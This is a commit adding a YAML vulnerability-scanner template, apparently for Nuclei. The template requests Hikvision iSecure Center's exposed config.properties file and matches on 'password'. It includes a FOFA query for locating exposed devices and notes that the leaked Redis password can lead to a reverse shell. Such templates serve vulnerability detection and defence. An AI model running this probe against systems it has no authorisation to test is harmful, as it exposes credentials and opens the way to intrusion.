Add hikvision-iSecure-info-leak.yaml

http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml

@@ -0,0 +1,33 @@
+id: hikvision-iSecure-info-leak
+
+info:
+  name: zongheanfang-info-leak
+  author: adeljck
+  severity: critical
+  description: |
+    Hikvision iSecure Center /portal/conf/config.properties can get encrypted redis password,if server expose redis port.people can get a reverse shell with redis.
+  reference:
+    - https://github.com/adeljck/Hikvision_Info_Leak
+  metadata:
+    verified: true
+    max-request: 2
+    fofa-query: icon_hash="-808437027",app="HIKVISION-综合安防管理平台",title="综合安防管理平台",body="/portal/skin/ifar/blue/skin.css"
+  tags: infoleak,iot,hikvision
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/portal/conf/config.properties"
+    headers:
+      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+      Accept-Encoding: gzip, deflate
+      Sec-Fetch-Dest: empty
+      Sec-Fetch-Mode: cors
+      Sec-Fetch-Site: same-origin
+      Te: trailers
+      Connection: close
+
+    matchers:
+      - type: word
+        words:
+          - 'password'